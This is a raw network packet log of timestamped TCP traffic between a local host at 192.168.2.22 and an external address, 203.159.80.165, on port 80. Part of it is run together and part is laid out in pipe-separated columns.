                                Aug 2, 2021 11:00:29.917984009 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.917994976 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918016911 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918037891 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918040991 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918055058 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918080091 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918081045 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918082952 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918102026 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918123960 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918132067 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918135881 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918144941 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918165922 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918174982 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918178082 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918186903 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918207884 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918229103 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918230057 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918232918 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918252945 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918265104 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918267012 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918275118 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918297052 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918303967 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918307066 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918318033 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918339014 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918359041 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918359995 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918363094 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918380976 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918386936 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918390036 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918401957 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918426037 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918431044 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918433905 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918454885 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918488979 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918493032 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918508053 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918530941 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918550968 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918565989 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918569088 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918571949 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918592930 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918603897 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918606043 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918615103 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918634892 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918642998 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918647051 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918656111 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918679953 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918682098 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918685913 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918700933 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918721914 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918730974 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918734074 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918744087 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918765068 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918772936 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918776035 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918785095 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918806076 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918816090 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918818951 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918826103 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918852091 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918862104 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918867111 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918873072 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918894053 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918905020 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918908119 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918914080 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918935061 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918940067 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918941975 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918955088 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918977022 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.918986082 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918989897 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.918998003 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919022083 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919028997 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919032097 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919044971 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919064999 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919075966 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919079065 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919085979 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919107914 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919127941 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919132948 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919135094 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919147015 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919167042 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919179916 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919188023 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919208050 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919217110 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919219971 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919231892 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919253111 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919261932 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919265032 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919274092 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919295073 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919308901 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919313908 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919316053 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919336081 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919347048 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919351101 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919358015 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919378996 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919387102 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919389009 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919403076 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919425011 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919435024 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919437885 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919445992 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919466019 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919475079 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919477940 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919487953 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919508934 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919517040 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919518948 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919529915 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919550896 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919564009 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919569016 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919574976 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919596910 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919605017 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919606924 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919617891 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919639111 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919645071 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919647932 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919660091 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919681072 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919684887 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919687033 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919703007 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919724941 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919732094 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919734955 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919747114 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919769049 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919775009 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919779062 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919790030 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919810057 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919814110 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919816971 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919831038 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919852018 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919855118 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919857979 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919873953 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919897079 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919898987 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919909954 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919934034 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919955015 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919965029 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919967890 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.919975996 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.919996977 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920003891 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920006037 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920017004 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920037985 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920047998 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920052052 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920059919 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920080900 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920090914 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920094013 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920104980 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920126915 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920133114 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920136929 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920146942 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920170069 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920191050 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920200109 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920202971 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920212030 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920229912 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920233011 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920236111 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920257092 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920264006 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920268059 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920280933 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920304060 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920314074 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920316935 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920325041 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920346975 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920353889 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920356989 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920367956 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920389891 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920398951 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920402050 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920412064 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920423985 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920433044 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920456886 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920480013 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920480013 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920483112 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920500994 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920511961 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920516968 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920521021 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920542002 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920555115 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920557976 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920562983 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920583010 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920598030 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920600891 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920607090 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920623064 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920634031 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920655012 CEST8049169203.159.80.165192.168.2.22
                                Aug 2, 2021 11:00:29.920665026 CEST4916980192.168.2.22203.159.80.165
                                Aug 2, 2021 11:00:29.920667887 CEST4916980192.168.2.22203.159.80.165
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 2, 2021 11:00:29.920675993 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920696974 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920705080 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.920708895 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.920717955 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920737028 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920748949 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.920752048 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.920762062 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920782089 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920789957 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.920793056 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.920804977 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920813084 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.920826912 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920846939 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920850039 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.920852900 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.920867920 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920888901 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920897007 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.920901060 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.920908928 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920921087 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.920929909 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920950890 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920958996 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.920964003 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.920975924 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.920999050 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921003103 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921006918 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921019077 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921031952 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921040058 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921051979 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921057940 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921077013 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921087980 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921092033 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921097040 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921116114 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921127081 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921138048 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921144009 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921147108 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921158075 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921165943 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921190977 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921214104 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921228886 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921231985 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921235085 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921256065 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921261072 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921263933 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921276093 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921297073 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921305895 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921310902 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921315908 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921336889 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921341896 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921344995 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921356916 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921380043 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921382904 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921386957 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921401978 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.921430111 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.921432972 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926578045 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926614046 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926637888 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926660061 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926683903 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926695108 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926708937 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926713943 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926716089 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926732063 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926733017 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926737070 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926753998 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926759958 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926775932 CEST | 49169 | 80 | 192.168.2.22 | 203.159.80.165
Aug 2, 2021 11:00:29.926775932 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
Aug 2, 2021 11:00:29.926799059 CEST | 80 | 49169 | 203.159.80.165 | 192.168.2.22
